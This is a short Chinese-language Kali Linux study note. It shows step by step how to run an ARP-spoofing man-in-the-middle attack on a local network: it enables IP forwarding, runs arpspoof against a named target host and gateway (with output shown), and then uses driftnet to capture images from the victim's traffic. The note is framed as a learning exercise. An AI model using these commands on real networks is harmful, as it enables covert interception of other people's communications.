@websec007
2017-04-22T15:47:15.000000Z
字数 814
阅读 2051
kali学习
(1)drifnet #本地网卡图片抓取
(2)echo 1 > /proc/sys/net/ipv4/ip_forward #本地数据转发开启
(3)arpspoof #arp 网关欺骗
(1)目标主机:192.168.31.123
(2)网关地址:192.168.31.1
root@kali:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@kali:~# arpspoof -i eth0 -t 192.168.31.123 192.168.31.1
0:c:29:3:9:67 8:60:6e:c8:75:c4 0806 42: arp reply 192.168.31.1 is-at 0:c:29:3:9:67
0:c:29:3:9:67 8:60:6e:c8:75:c4 0806 42: arp reply 192.168.31.1 is-at 0:c:29:3:9:67
0:c:29:3:9:67 8:60:6e:c8:75:c4 0806 42: arp reply 192.168.31.1 is-at 0:c:29:3:9:67
0:c:29:3:9:67 8:60:6e:c8:75:c4 0806 42: arp reply 192.168.31.1 is-at 0:c:29:3:9:67
....
不断的向网段中发送arp广播,告诉主机192.168.31.123目标网关地址的mac地址是kali主机的网卡地址,从而达到欺骗目标主机,为实现中间人攻击准备好前奏。
root@kali:~# driftnet -i eth0